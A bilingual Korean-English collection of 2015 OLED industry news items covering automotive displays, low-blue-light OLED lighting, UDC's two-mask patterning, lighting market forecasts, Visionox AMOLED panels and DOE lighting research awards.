이렇게 OLED를 이용한 조명과 디스플레이가 스마트카에 본격적으로 도입되면서 차량용 OLED에 대한 관심도 높아지고 있다. 삼성디스플레이와 LG디스플레이는 2015년 7월에 개최된 디스플레이 국가연구개발사업 총괄 워크샵에서 각각 미래 스마트카에 적용될 디스플레이에 대한 의견을 피력하였다.

삼성디스플레이의 추혜용 전무는 디스플레이의 미래는 스마트라고 밝히면서 스마트카도 그 중 하나라고 발표하였다. 또한 이런 스마트 기술들이 실현되려면 아이트래킹 기술과 음성인식 기술 등 부수적인 스마트 기술들도 뒷받침 되어야 된다고 밝혔다.

LG디스플레이의 윤수영 상무는 차량용 디스플레이는 CID, dash board, cluster, window에 활용될 수 있으며, 이를 위해서는 투명과 플렉서블 기술의 발전이 필수적이라고 발표하였다.

8월 19일 IMID 2015의 keynote session에서 현대자동차의 김문현 상무는 LCD 패널보다는 플렉시블 구현이 용이한 OLED 패널이 미래의 스마트카에 주로 적용될 것이라고 밝히며 전체 OLED 시장 중 자동차용 OLED의 비중은 증가할 것으로 전망되며 2017년에는 30%이상이 될 것으로 기대하였다.

Porsche Mission E, Porsche Home page

Mitsubishi Chemical and Pioneer Develops Bluelight-less OLED Lighting

Japan’s Mitsubishi Chemical and Pioneer announced their success in developing the first bluelight-less OLED lighting module. The two companies produced this module through a wet coating process for the light-emitting layer and began shipping samples on August 1.

The new OLED lighting module does not use blue emitting materials in the OLED panel and the light from the panel contains a minimal portion of blue light. According to the companies, this is less than 1% of the amount in the 3000K-type OLED lighting module developed by Mitsubishi Chemical and Pioneer.

The panel is a candle-color type with a 1900K color temperature; this is suitable for storage lighting of light-sensitive items such as cultural heritage and paintings, as well as lighting for bedrooms and medical practices.

Blue light, which has a wavelength of between 380 and 495 nanometers, has the highest energy among visible light. This is enough to reach the retina at almost full strength. This can cause eye fatigue as well as reduction in quality sleep.

With the increase of smartphone and PC use, the amount of time exposed to blue light is also increasing. Therefore, as the interest in eye health rises, this bluelight-less OLED lighting module development is worthy of attention.

 

Source: MPOL

Source: MPOL

 

Source: MPOL

Source: MPOL

[IMID 2015] UDC Develops OLED Patterning Technology with Less Masks

At present, FMM (Fine Metal Mask) is considered the main method for large area RGB OLED panel production. However, due to shadow effect, mask total pitch fluctuations, and mask slit tolerance issues, there is a yield limitation to this technology. This limitation increases as the resolution becomes higher; minimizing the number of FMM during the OLED panel production has been a key issue in RGB OLED production.

 

In SID 2014, through a paper titled “Novel Two Mask AMOLED Display Architecture”, UDC revealed a technology that can reduce the number of masks used in RGB-FMM method to 2 from previous 3.

 

Source : UDC, SID 2014

As shown above, this technology coats yellow and blue subpixels using 1 mask each. Following this process, green and red color filters are applied above the subpixels. Pixels are formed as illustrated below.

 

Source : UDC, SID 2014

UDC explained that this technology improves lifetime of the display overall and reduces energy consumption as blue voltage can be lowered. Additionally, tact time can be reduced through this technology, and increase the yield.

 

In IMID 2015, UDC presented research of the same title. However, the content of the presentation unveiled more developed research compared to 2014. First of all, in 2014, UDC announced that the panel’s lifetime could be improved by 2 times compared to the RGB method. In IMID 2015, UDC’s announcement changed the figure to 3.3 times increased lifetime.

 

UDC also revealed that the technology can be actualized through printing method, and has the advantage of being able to print 2 rows of pixels at once. UDC announced that this is most suitable when OVJP (Organic Vapor Jet Printing) applies the printing method.

 

A new technology called SPR (Sub-Pixel Rendering) was also announced by UDC in this paper. The 2014 SID paper included a method that did not uses SPR. As shown below in figure 1, 4 subpixels of RGY and B are used per pixel.

 

[Fig. 1], Source: UDC, IMID 2015

During IMID 2015, UDC presented APR technology applied pixel structure. Figure 2 shows 3 subpixels per pixel.

 

[Fig. 2], Source: UDC, IMID 2015

In this case, as the pixels can be arranged as shown in figure 3, smaller number of subpixels can be used.

 

[Fig. 3], Source: UDC, IMID 2015

UDC announced that because APR technology allows the number of subpixels per pixel to be reduced to 3 or less, the number of data lines and TFT per pixel can also be reduced together.

 

UDC explained that this technology can be applied regardless of the display area or resolution, and will be able to be applied to different types of panels.

 

Mitsubishi Chemical과 Pioneer, Bluelight-less OLED 조명 개발

일본의 Mitsubishi Chemical과 Pioneer가 최초로 Bluelight-less OLED 조명 모듈 개발에 성공했다고 발표했다. 두 회사는 wet coating 공정을 통해 발광층을 만든 이 모듈을 생산하고 지난 1일부터 샘플을 출하하기 시작했다.

이번 새로운 OLED 조명 모듈은 blue 발광 재료를 사용하지 않은 OLED 패널로 발산하는 빛은 최소한의 blue light를 포함하고 있다. Mitsubishi Chemical과 Pioneer는 새로 개발한 OLED 조명 모듈이 이전에 출시한 3000K-type OLED 조명 모듈의 1% 보다 적은 양의 blue light를 낸다고 밝혔다.

패널의 candle-color type은 1900K 색온도를 가지고 있다. 이는 빛에 민감한 문화 유산이나 페인팅 같은 것을 보관하는 곳의 조명뿐만 아니라 의료용과 침실용 조명으로도 적합하다.

380nm에서 495nm 사이의 파장을 가진 blue light는 가시광선 중 가장 큰 에너지를 가지고 있다. 이 빛은 거의 최대 에너지로 망막에 도달하기 충분하다. 망막에 도달한 빛은 눈의 피로뿐만 아니라 숙면을 방해의 원인이 된다.

스마트폰과 PC의 사용 증가로 blue light에 노출되는 시간이 길어지고 있다. 때문에 눈 건강에 대한 관심이 증가되고 있는 상황에서 이번 Bluelight-less OLED 조명 모듈 개발은 주목해야 할 성과가 될 것으로 예상된다.

Source : MPOL

Source : MPOL

New Solution for Next Generation OLED Lighting

Professor Lee Taek Seung of Chungnam National University

Professor Lee Taek Seung of Chungnam National University

 

Professor Taek Seung Lee and Jongho Kim (Chungnam National University’s Department of Advanced Organic Materials and Textile System Engineering), and Professor Jin Sung-Ho and Park Juhyeon (Pusan National University’s Graduate Department of Chemical Materials, and Institute for Plastic Information and Energy Materials) authored a paper titled ‘Synthesis of conjugated, hyperbranched copolymers for tunable multicolor emissions in light-emitting diodes’. For 2015 June issue, Polymer Chemistry, published by the Royal Society of Chemistry, selected it as its back cover.

 

The paper discusses research of polymer material applied to solution process and explains that through polymer structure in the form of hyperbranched red, green, and blue monomers, diverse colors, including white, can be actualized depending on the amount of each monomer. Existing OLED lighting used R/G/B or YG/B stacking structure to produce white OLED, complicating the process. Although a method of producing white by combining R/G/B together is being developed, energy displacement between R/G/B can cause unwanted colors. However, if the R/G/B monomers can be introduced to polymer structure as hyperbranched forms as the paper suggests, the energy displacement can be minimized when the polymer solidifies which makes it easier for the colors to be realized.

 

Professor Lee revealed that hyperbranched polymer materials were used in the research and that as white can be produced from just one polymer material, simple process can be used for the production.

 

The patent for this technology has been applied (application number 10-2012-0091350) in Korea. It is anticipated that this will become a key technology for reducing the next generation OLED lighting production cost.

 

원리

차세대 OLED 조명의 새로운 솔루션 등장

충남대학교 이택승 교수

충남대학교는 이택승(유기소재·섬유시스템공학과) 교수와 김종호(박사과정) 학생이 부산대학교 진성호(화학교육과) 교수와 박주현 학생과 함께 발표한 논문이 고분자화학 분야 최우수저널인 영국화학회의 ‘Polymer Chemistry’ 백 커버로 선정됐다고 15일 밝혔다.

이 논문은 solution process에 적용되는 고분자(polymer)재료에 대한 것으로, red와 green, blue의 단량체(monomer)를 초분지 형태로 고분자 구조에 도입하여 각 단량체의 함량에 따라 다양한 색을 구현할 수 있기 때문에 white도 구현할 수 있다. 기존의 OLED 조명은 white OLED를 제작하기 위해서 R/G/B 또는 YG/B를 적층하는 구조를 사용하고 있어 공정이 복잡하다. R/G/B를 섞어서 한번에 white를 형성하는 방법도 개발되고 있지만 R/G/B간의 에너지 전이에 의해 원하지 않는 색을 발광하는 문제가 발생한다. 하지만 논문에서처럼 R/G/B로 발광할 수 있는 단량체를 초분지 형태로 고분자 구조에 도입하게 되면 고분자가 고체화 되었을 때 분자간의 에너지 전이현상을 최소화 할 수 있어 원하는 색상구현에 용이하다.

이택승 교수는 “이번에 발표된 고분자 재료는 초분지 구조(hyperbranched)를 적용하였으며, 한가지의 고분자 재료로도 백색광을 구현할 수 있어 단순한 공정으로 제조가 가능하다.” 라고 하였다.

이 기술은 국내에서 특허(출원번호 10-2012-0091350)로도 출원된 바 있으며, 차세대 OLED 조명의 원가 절감을 위한 핵심 기술이 될 수 있을 것으로 기대된다

.

OLED Rises to Become Purple Ocean of Existing Lighting Industry

OLED is receiving much attention as the next generation lighting as a greener lighting that can replace existing incandescent and fluorescent lights and reduce energy consumption, as well as lighting that can create new market. According to this trend, many organizations are analyzing OLED lighting industry in diverse directions and presenting the analysis.

At the 5th LED Industrial Forum which was held recently together with LED & OLED Expo 2015, Song Hyokyung, a senior researcher of WIPS, gave a presentation on the topic of OLED lighting industry’s patent trend and market status. She explained that as OLED lighting sector is a new market with a great growth potential, the technology development competition is fierce, and presented SWOT analysis results of Korean businesses.

For Korean OLED lighting industry’s strengths, Song gave examples which included world’s highest quality of OLED, AMOLED development and mass production technology, production ability, and diverse convergence technology solution. As for the opportunity factors, Song suggested application expansion through convergence with flexible technology, and increase in demand as the lighting market expands. On the other hand, Song revealed that the deficiency in original key technology on OLED material and components and the lack of mid to long term strategy regarding new technology development could be a weakness for Korean industry. She also gave China’s pursuit, possession of intellectual property rights by leading companies, and appearance of new light sources such as QLED (quantum dot emitting diode) as factors that could pose threat. However, OLED lighting induces warm atmosphere as well as being environmentally friendly and a future convergence industry. With these factors, Song concluded that if these weaknesses and threat factors can be overcome, OLED lighting will be able to show higher CAGR than other lighting markets.

UBI Research analyzed OLED lighting industry via STEEP analysis method in OLED Lighting Annual Report, published in May, 2015. UBI Research analyzed that as income increases, interest in interior design light using specialized lighting, other than necessary lighting, increases. Also, in terms of technology, OLED lighting projects in Korea, the US, and Europe are actively being carried out and estimated that the technology development will gain speed through related technology integration.

Economically, UBI Research analyzed that the market entry barrier is not high as the OLED lighting industry is not monopolistic. In terms of environment, incandescent lighting’s carbon production and fluorescent light’s mercury are becoming big concerns. Based on these factors UBI Research forecast that demand for green lighting, such as OLED lighting, will increase. Policy wise, OLED lighting industry clusters were formed and are supported by Korean and Japanese governments. As OLED lighting related projects are also being vigorously carried out OLED lighting industry is expected to become a high growth industry.

Based on both analyses OLED lighting is anticipated to be an industry with much potential for growth. If speedy technology development occurs and demand for environmentally friendly lighting increases, it is expected that the OLED lighting share of total lighting market will rapidly increase. UBI Research estimated that total OLED lighting market will grow at CAGR of approx. 70% from 2016, and show US$ 10,000 million revenue in 2025.

 

LG Chem.’s Flexible OLED Lighting, Euroluce 2015

LG Chem.’s Flexible OLED Lighting, Euroluce 2015

 

OLED, 기존 조명 산업의 Purple Ocean으로 부상

OLED 조명은 환경규제와 에너지 절약을 위해 기존의 백열등과 형광등을 대체할 수 있고 새로운 조명 시장을 창출할 수 있는 차세대 조명으로 주목받고 있다. 이런 동향에 부합하여 여러 기관에서는 OLED 조명산업을 다양한 방향으로 분석하여 발표하고 있다.

최근 ‘국제 LED & OLED 엑스포 2015’와 함께 열린 제5회 LED산업포럼에서 송효경 윕스 책임연구원은 ‘OLED조명산업의 특허동향과 시장현황’이라는 주제발표를 통해 OLED 조명 분야는 새로운 시장이면서 성장 가능성이 큰 사업이기 때문에 기술 우위를 점하기 위한 기술개발 경쟁이 치열하게 진행되고 있다고 발표하면서 국내 산업의 SWOT분석결과를 제시하였다

송연구원은 국내 OLED조명산업의 강점으로 세계 최고의 OLED, AMOLED 개발과 양산기술, 생산능력, 다양한 융합기술에 대한 솔루션을 꼽았다. 또 기회요인으로는 플렉서블 기술과의 융합을 통한 적용분야의 확대, 조명시장이 확대되는데 따른 수요의 증가 등을 제시하였다. 반면 OLED 소재와 부품에 대한 원천핵심기술 부족과 신기술 개발에 대한 중장기 전략 미흡이 약점이 될 수 있다고 밝혔으며, 위협요인으로는 중국의 추격과 선진 기업의 지적재산권 선점, QLED(양자점 발광다이오드)와 같은 새로운 광원의 출현을 꼽았다. 송연구원은 “이러한 약점과 위협요인들이 극복된다면 친환경, 감성, 미래 융합 산업이라는 점에서 OLED 조명은 다른 조명 시장보다 큰 연평균 성장률을 기록할 것으로 전망된다”고 말하였다.

유비산업리서치에서 2015년 5월에 발간한 “OLED Lighting Annual Report”에서는 STEEP분석법을 통해 OLED 조명 산업을 분석하였다. 유비산업리서치는 사회적으로 소득이 증가할수록 생활에 꼭 필요한 필수조명 이외의 특수조명을 이용한 인테리어 디자인 조명에 관심이 높아진다고 분석하였다. 또한 기술적으로 한국과 미국 유럽의 OLED lighting project가 적극적으로 진행되고 있으며, 관련 기술 집적화를 통해 기술 개발이 빠르게 진행될 것으로 예상하였다.

경제적으로는 OLED 조명 산업은 독과점 형태를 띄고 있지 않아 시장 진입 장벽이 높지 않다고 분석하였으며 환경적으로는 백열등의 탄소 생성과 형광등의 수은 함유에 대해 환경적 문제가 대두되고 있어 OLED와 같은 친환경 조명에 대한 수요가 늘어날 것이라고 전망했다. 또한 정책적으로는 한국과 일본 정부에서 OLED 조명 산업 클러스터 조성사업을 선정하고 지원하고 있으며, 유럽에서도 OLED 조명 관련 프로젝트들이 활발하게 진행 중에 있기 때문에 OLED 조명 산업이 앞으로 고성장 산업으로서 거듭날 것으로 예상하였다.

두 가지의 분석법을 종합해볼 때 OLED 조명은 충분히 성장 가능한 산업으로 전망되며, 빠른 기술 개발과 친환경 조명에 대한 수요의 증가가 이루어진다면 전체 조명 시장에 대한 점유율을 빠른 시간 내에 높일 수 있을 것으로 예상된다. 유비산업리서치에서는 OLED lighting 전체 조명 시장을 2016년부터 연평균 성장률 약 70%로 성장하여 2025년에는 US$ 10,000 million의 시장을 형성 할 것으로 전망하였다.

LG Chem.'s Flexible OLED Lighting, Euroluce 2015

LG Chem.’s Flexible OLED Lighting, Euroluce 2015

 

[LED/OLED EXPO 2015] Low Cost OLED Lighting Panel Production, QD Film Provides the Solution?

One of the reasons that OLED lighting is not becoming commercialized, despite its diverse advantages compared to other lightings, is its high price. The most fundamental way to reduce OLED lighting panel cost is investment in OLED lighting panel mass production line. Price reduction for components and materials is also an important factor.

 

The OLED lighting panel that is currently being mass produced has red/green/blue or yellow/blue stack structure. Also the use of tandem structure of more than 2 stacks to increase efficiency makes the process complex, lowers the yield, and increases the amount of materials used, and is becoming a key factor in increasing the production cost.

 

At LED/OLED Expo 2015, Cheorwon Plasma Research Institute (CPRI) displayed technology that produces white by applying light extracting film that contains red and green quantum dot (QD) material on blue OLED. CPRI forecasts that this technology of QD film applied blue OLED will be the solution for lowering OLED lighting panel production cost.

 

CPRI’s senior researcher Yong Hwan Yoo explained, “When QD light extracting film is applied to blue OLED, the evaporation processes are reduced compared to existing RGB or YB tandem structure OLED lighting. This could lead to production cost reduction as the yield increases and material cost decreases. If the QD purity improves, as well as blue material’s lifetime and efficiency, it is anticipated that the efficacy will match that of RGB or YB tandem OLED lighting panel.”

 

CPRI exhibited LED caps to be used for mascots at the opening/closing ceremonies of PyeongChang 2018 Winter Olympics, ultimately aiming for manufacturing them using OLED lighting panel instead of LED.

 

 

[LED/OLED EXPO 2015] Low cost OLED lighting panel 제조, QD film이 해결책?

OLED lighting이 다른 조명들에 비해 다양한 장점을 가지고 있음에도 불구하고 상용화 되지 못하고 있는 이유 중 하나는 높은 가격이다. OLED lighting panel의 가격을 낮출 수 있는 근본적인 방법은 OLED lighting panel 양산라인 투자이며, 그 밖에 부품과 재료에 대한 비용 절감도 중요한 요소이다.

현재 양산중인 OLED lighting panel은 red/green/blue 또는 yellow/blue의 적층 구조로서 양산되고 있다. 또한 효율을 높이기 위해 2stack 이상의 tandem 구조를 적용하는 방법이 사용되어 공정이 복잡해지고 수율이 낮아지며 재료사용량이 증가하는 등 원가 상승의 핵심 요인이 되고 있다.

LED/OLED Expo 2015에서 철원 플라즈마 산업기술연구원(CPRI)는 blue OLED에 red와 green QD(quantum dot) 재료를 포함한 광추출 film을 적용하여 white를 구현하는 기술을 선보이며 QD film을 적용한 blue OLED가 OLED lighting panel의 원가절감 솔루션이 될 수 있을 것으로 내다봤다.

CPRI의 유용환 선임연구원은 “Blue OLED와 QD 광추출 film을 적용하면 기존의 RGB또는 YB tandem구조의 OLED lighting보다 증착 process가 감소하기 때문에 수율이 상승하고 발광재료 사용비용이 줄어들어 원가절감이 될 수 있다. QD의 순도가 개선되고 blue material의 수명과 효율특성이 개선된다면 RGB 또는 YB 적층의 OLED lighting panel만큼의 효율도 가능할 것으로 기대된다.” 라고 밝혔다.

CPRI는 2018년 평창 동계올림픽의 개/폐회식 때 마스코트용으로 활용하기 위한 LED 모자를 전시하였으며, 최종적으로는 LED 대신 OLED lighting panel로서 제작하는 것을 목표로 개발 중에 있다.

<IoT가 적용된 LED 모자>

 

[LED/OLED EXPO 2015] O’CLESS Propels OLED Lighting Commercialization

At LED/OLED EXPO 2015 (23 – 26 June), HaeChan Design revealed that through OLED lighting specializing brand O’CLESS they are expanding into international market as well as within the domestic market in Korea.

 

HaeChan Design was established in July, 2013, and launched OLED lighting brand O’CLESS. O’CLESS is producing using the combination of LG Chem.’s OLED lighting panel, and their own designs and ideas.

 

In this exhibition, O’CLESS presented diverse lighting such as night light, portable light, stand light, mirror light, and rail connection down light. Particularly, smart system that can control down light using smartphone drew much attention from the visitors.

 

Seungchul Oh, the President of HaeChan Design, reported that they “began exporting to Japan and China following the domestic release in Korea”, and they are planning to “expand the market as a global OLED lighting specializing business once the new business establishment in Innovation City Chungbuk is completed”. Regarding the price issue, which is OLED lighting market’s biggest obstacle, Oh viewed future of OLED lighting market in a positive light: “P company’s night light is being sold for 200,000-300,000 KRW (200-300 USD) but even with application of OLED and Retinispora wood, O’CLESS’ product has competitive edge with approx. 100,000 KRW (100 USD). Although panel’s price is essential as design and practicality are more important in the lighting industry, application creation appropriate for the high cost of OLED is more important. OLED panel price has already fell considerably and will continue to do so and therefore can compete against LED or other lightings in terms of price.”

 

In February this year, HaeChan Design installed approximately 1,000 OLED desk lamps with LG Chem.’s OLED lighting panels in Seoul National University’s library. They also set up booths in 2014 LED/OLED Application & Technology Show and 2015 Kyunghyang Housing Fair, focusing on O’CLESS marketing.

O’CLESS Booth, LED/OLED EXPO 2015

[LED/OLED EXPO 2015] O’CLESS, OLED 조명 사업화 본격적으로 추진

6 23일부터 26일까지 일산 KINTEX에서 개최되는 LED/OLED EXPO 2015에서 해찬디자인은 OLED 조명 전문 브랜드인 O’CLESS를 통해 국내를 비롯하여 해외까지 본격적으로 사업을 진행하고 있다고 밝혔다.

해찬디자인은 20137월에 설립되었으며, OLED 조명 전문 브랜드 O’CLESS20149월에 런칭하여 LG Chem.OLED lighting panel과 자사의 디자인, 아이디어를 조합하여 제품을 생산하고 있다.

이번 전시회에서 해찬디자인은 O’CLESS 브랜드로 수유등과 휴대용조명, 스탠드조명, 거울조명, rail connection 천장조명등 다양한 OLED 조명을 전시하였다. 특히 smart phone으로 천장 조명을 control 할 수 있는 smart system을 선보이며 관람객들의 큰 관심을 끌었다.

해찬디자인의 오승철 대표는 국내 출시에 이어 일본과 중국에 대한 수출도 시작하였으며, 연말 충북혁신도시내 새로운 사업장이 완공되면 글로벌 OLED조명 전문기업으로서 시장을 더욱 확대시켜 나갈 것이라고 밝혔다. OLED lighting 시장의 가장 큰 걸림돌인 가격문제에 대해서는 “P사에서 판매중인 수유등은 약 20~30만원선이지만 O’CLESS 수유등은 OLED와 편백나무를 적용했음에도 불구하고 10만원대로 더욱 가격경쟁력이 있다. 조명시장에서는 디자인과 실용성이 더 중요시 되기 때문에 광원의 가격도 중요하지만, 고가의 OLED에 적합한 application 발굴이 더 중요하다. OLED panel 가격도 상당히 하락했고 앞으로도 지속적으로 하락할 것이기 때문에 LED나 기타 조명과의 가격경쟁력도 확보할 수 있다라고 말하며 앞으로의 OLED 조명시장을 긍정적으로 내다봤다.

해찬디자인은 올 2월 서울대학교 도서관에 LG Chem. OLED lighting panel을 적용한 OLED stand 1천여개를 설치한 바 있으며, LED/OLED 산업전 2014 2015 경향하우징페어에서도 부스를 열며 O’CLESS에 대한 마케팅을 적극적으로 펼치고 있다.

 

O’CLESS 부스 전경, LED/OLED EXPO 2015

 

Lighting Industry Market Control by Stable Major Companies, OLED Lighting Shakes It Up

Key companies of lighting industry, such as Osram, Philips, Panasonic, and GE Lighting, occupies approximately 70% of total lighting market and maintains stable entry barrier. Most of the key companies are also actively carrying out OLED lighting development as next generation lighting. As they reveal new OLED lighting panels each year, it is estimated that these companies will play a major role in next generation lighting market.

However, once OLED lighting market is vitalized, the existing lighting companies’ stable market control is expected to be rattled.

OLED Lighting Annual Report, published by UBI Research, pointed out that major lighting companies have already invested in LED lighting in large scale, and estimated until the investment cost is returned new investment for OLED lighting will be difficult. To stimulate OLED lighting market the report suggested push market, a strategy being used in display market. According to the report, the production cost competitiveness can be achieved through aggressive investment by LG Chem. and new OLED lighting companies such as Lumiotec. The report also estimated once OLED lighting market is open through aggressive investment and push market strategy, the lighting market leadership will be transferred to new OLED lighting companies which invested in OLED lighting early from major companies which missed investment timing.

Total Lighting Market Structure Forecast

Total Lighting Market Structure Forecast

OLED lighting market is currently being formed through specialized uses such as for interior/outdoor design, shop, restaurant, medical, and cosmetic. Konica Minolta has already completed mass production line investment and the line has been in operation since the end of 2014. LG Chem. is also positively considering mass production line investment. When OLED lighting panel’s active mass production begins, the market is forecast to expand as specialized lighting and replacement lighting for incandescent and fluorescent lights. From 2020, when OLED lighting panel is estimated to achieve reasonable price as interior lighting through major panel companies’ active mass production, it is estimated it will grow by encroaching part of LED lighting market.

From 2017 OLED lighting panel market for interior lighting is forecast to grow rapidly at CAGR of approximately 90%, and record US$ 5,700 million revenue in 2025. Flexible OLED lighting panel is estimated to be used where normal lighting application is difficult and occupy approximately 27% of OLED interior lighting market in 2025.

Interior Lighting Market Forecast

Interior Lighting Market Forecast

 

견고한 조명산업 major 업체들의 시장 지배력, OLED lighting이 뒤흔든다.

조명산업의 핵심 업체는 Osram과 Philips, Panasonic, GE Lighting 등으로 전체 조명시장의 약 70%를 차지하며 견고한 진입장벽을 구축하고 있다. 또한 핵심업체 중 대부분은 차세대 조명으로 OLED lighting 개발도 적극적으로 진행하며 매년 새로운 OLED lighting panel들을 공개하고 있어 차세대 조명시장에서도 핵심 역할을 할 것으로 대부분의 업계에서 예상하고 있다.

하지만 OLED lighting 시장이 활성화가 된다면 기존 핵심 조명업체들의 견고한 시장 지배력이 흔들릴 것으로 전망된다.

<표1. 전체 조명 시장 구도 전망>

유비산업리서치에서 발간한 “OLED Lighting Annual Report”에 따르면, major 조명업체들은 이미 LED lighting에 대한 대규모 투자가 이루어 졌기 때문에 투자비가 회수되기 전 까지는 OLED lighting에 대한 신규 투자를 할 여력이 없을 것으로 예상 했다. OLED lighting 시장이 활성화가 되기 위해서는 display 시장에서 push market으로 시장을 형성하듯이 LG Chem.과 Lumiotec등의 신규 OLED lighting 업체들이 공격적인 투자로 원가경쟁력을 확보하여 push market으로서 OLED lighting 시장을 형성해야 될 것으로 내다봤다. 또한 보고서에서는 공격적인 투자와 push market 전략으로 OLED lighting 시장 개화가 이루어 진다면 투자 시점을 놓친 major 업체들에서 투자를 먼저 진행한 신규 OLED lighting 업체들로의 조명시장 주도권이 넘어갈 것으로 전망하였다.

현재 OLED lighting 시장은 실내/실외 design과 shop, restaurant, medical, cosmetics등 특수 용도로서 시장을 형성해 나가고 있다. Konica Minolta에서는 이미 양산라인에 대한 투자가 완료되어 2014년 말부터 가동 중에 있으며 LG Chem.도 양산라인 투자를 긍정적으로 검토 중이다. OLED lighting panel의 본격적인 양산이 시작되면 특수조명 시장과 백열등과 형광등의 대체조명으로 시장을 확대할 것으로 예상되며, 주요 panel 업체들의 본격적인 양산을 통해 OLED lighting panel이 실내조명으로서 합리적인 가격을 확보하게 될 것으로 예상되는 시점인 2020년부터는 실내조명 시장에서 LED lighting 시장의 일부를 잠식하며 성장할 것으로 전망된다.

실내조명용 OLED lighting panel 시장은 2017년부터 연평균 성장률 약 90%로 급성장 할 것으로 전망되며 2025년에 US$ 5,700 million 규모가 될 것으로 예상된다. 또한 실내조명으로서 flexible OLED lighting panel은 일반 조명들이 적용되기 어려운 부분에 실내 interior용 조명으로 적용되어 2025년 OLED 실내조명 시장의 약 27%를 차지할 것으로 전망된다.

DDD

<표2. 실내조명 시장전망>

Visionox, Close to High Resolution AMOLED Panel Mass Production

Visionox is earnestly developing high resolution flexible AMOLED panel with impending active AMOLED mass production. In CITE 2015 (April 9 – 11), held in Shenzhen in China, Visionox exhibited AMOLED product and OLED lighting.

 

AMOLED Display Panel by Visionox

AMOLED Display Panel by Visionox Source: Visionox

 

According to Visionox, although they cannot reveal detailed specifications as it is a newly developed prototype, they solved color shift issue and produced high resolution panel using high pixel arrangement technology. As a next generation product, flexible AMOLED mass production line is being considered.

 

In April 2014, Visionox developed 4.3inch 570ppi resolution AMOLED panel by developing new pixel formation technology. Additionally, Visionox established first Gen5.5. AMOLED mass production line at the end of 2014 and is preparing for active mass production. Mass production capacity is 15K and the products will be used in devices such as mobile phones.

 

OLED Light by Visionox

OLED Light by Visionox Source: Visionnox

 

Visionox is also focusing on OLED lighting panel industry. In 2009, Visionox produced first OLED decoration lighting products in Mainland China. Visionox is aiming for OLED lighting panel mass production in 2017, and working on improving lifetime and luminous efficiency.

Visionox, 고해상도 AMOLED panel 양산 눈앞

Visionox가 본격적인 AMOLED 양산을 앞두고 고해상도 AMOLED와 flexible AMOLED panel을 적극적으로 개발 진행 중이다. 2015년 4월 중국 Shenzhen에서 개최된 CITE 2015에서 Visionox는 고해상도 AMOLED panel과 OLED lighting을 전시하였다.

The AMOLED display panel of Visionox

The AMOLED display panel of Visionox, Source : Visionox

Visionox 관계자에 의하면 “최근 개발된 prototype으로서 구체적인 스펙은 밝힐 수 없지만 color shift 문제를 해결하고 high pixel arrangement technology를 적용하여 고해상도의 panel을 구현하였으며, 차세대 제품으로서 flexible AMOLED panel 양산라인도 계획하고 있다.”고 언급하였다.

Visionox는 2014년 4월 새로운 pixel 구조 기술을 개발하여 4.3inch, 570ppi 해상도의 AMOLED panel을 개발한 바 있었다. 또한, 2014년 말에 Visionox는 첫 Gen5.5 AMOLED 양산 라인을 건설하였으며, 본격적 양산을 준비 중에 있다. 양산라인 생산량은 15K이며 생산된 제품은 모바일 폰 등에 사용될 예정이다.

The OLED Light of Visionox

The OLED Light of Visionox, Source : Visionox

Visionox는 OLED lighting panel 사업에도 주력하고 있다. 2009년 Visionox는 첫 장식용 OLED lighting을 중국 본토에서 생산하였다. Visionox는 2017년 OLED lighting panel 양산을 목표로 하고 있으며, OLED lighting panel의 수명과 발광효율을 향상시키는 연구를 집중적으로 진행 중에 있다.

By DaRae Kim, reporter@olednet.co.kr

DOE Selects 4 OLED Projects for 2015 SSL R&D Lighting Awards

Earlier this month U.S. Department of Energy (DoE) announced 2015 Solid-State Lighting (SSL) Program awards. This is a part of DoE initiative to accelerate the adoption of SSL technology and focuses on developing an energy-efficient, full spectrum, white light source for general illumination. Through SSL technology, DoE hopes to reduce U.S. lighting energy usage and contribute to climate change solutions.

 

For 2015 SSL Program awards, 9 projects were selected and of these 4 were OLED projects. Acuity Brands, Arizona State University, Sinovia Technologies, and University of Michigan received a total of approximately US$3,800,000.

 

Acuity Brands received US$ 455,131 to develop an OLED luminaire that features DC current drivers integrated with each panel, and a base station that interfaces with user control input, provides power to the OLED panels, and translates the control input to desired functionalities of the panels.

 

Arizona State University received US$ 700,000 to focus on developing an efficient and stable phosphorescent material, quick-screening it, and incorporating it into a state-of-the-art OLED.

 

Sinovia Technologies received US$ 1,326,170 to combine a barrier film technology with a nanowire transparent conduction film to make a single substrate product that will improve light extraction and lower the cost of OLEDs.

 

US$ 1,314,240 was awarded to University of Michigan to focus on new strategies for increasing the lifetime of blue phosphorescent OLEDs (PHOLEDs).

 

Additionally, DoE selected 4 OLED lighting projects earlier this year through SBIR-STTR Grants (Small Business Innovation Research to OLEDWorks, MicroContinuum, and Pixelligent Technologies, and awarded approx. US$ 2,250,000 in total. This brings the total amount so far that DoE invested in OLED lighting projects in 2015 to approx. US$ 6,000,000, which is an increase of about US$ 1,600,000 from 2014.

 

2015 DoE Funded OLED Lighting Projects

2015 DoE Funded OLED Lighting Projects

DOE, 2015년 SSL R&D Lighting Awards에서 4가지의 OLED 프로젝트 선정

미국 에너지국(DoE)은 5월 4일 2015 Solid-State Lighting (SSL) Program awards의 수상자를 발표하였다. SSL Program awards는 SSL 기술의 육성을 장려하며, 에너지 효율이 좋고 태양광과 유사한 파장의 전체 조명용 백색 광원을 개발하기 위한 목적으로 만들어졌다. DoE는 SSL 기술이 미국의 조명 에너지 소비를 줄이고 이상 기후 등 환경문제에 도움을 줄 것으로 기대하고 있다.

이번 SSL Program awards에는 9개의 프로젝트가 채택되었고 이 중 4가지가 OLED Lighting 관련 프로젝트다. 프로젝트에 참여하는 Acuity Brands와, Arizona State 대학, Sinovia Technologies, Michigan 대학은 모두 약 US$3.8 Million를 지원받았다.

Acuity Brands는 OLED panel에 전력을 공급하며, 패널에 가하는 전류 신호를 원하는 기능들로 변환하는 기지국과 전류 드라이버를 특징으로 하는 OLED 조명을 개발하는 것으로 US$0.45 Million를 지원받았다.

Arizona State 대학은 효율적이고 안정적인 인광 물질 개발과 이를 적용한 OLED 패널, 패널 inspection까지의 통합적인 기술을 연구하는데 US$0.7 Million를 지원받았다.

Sinovia Technologies는 베리어 필름 기술과 나노와이어 투명 전극 필름 기술을 결합하여, 광추출을 향상시키고 원가를 낮추는 단일 기판 제품을 만드는 연구에 US$1.3 Million를 지원받았다.

Michigan대학은 블루 인광 OLED의 수명을 향상시키기 위한 연구에 US$1.3 Million를 지원받았다.

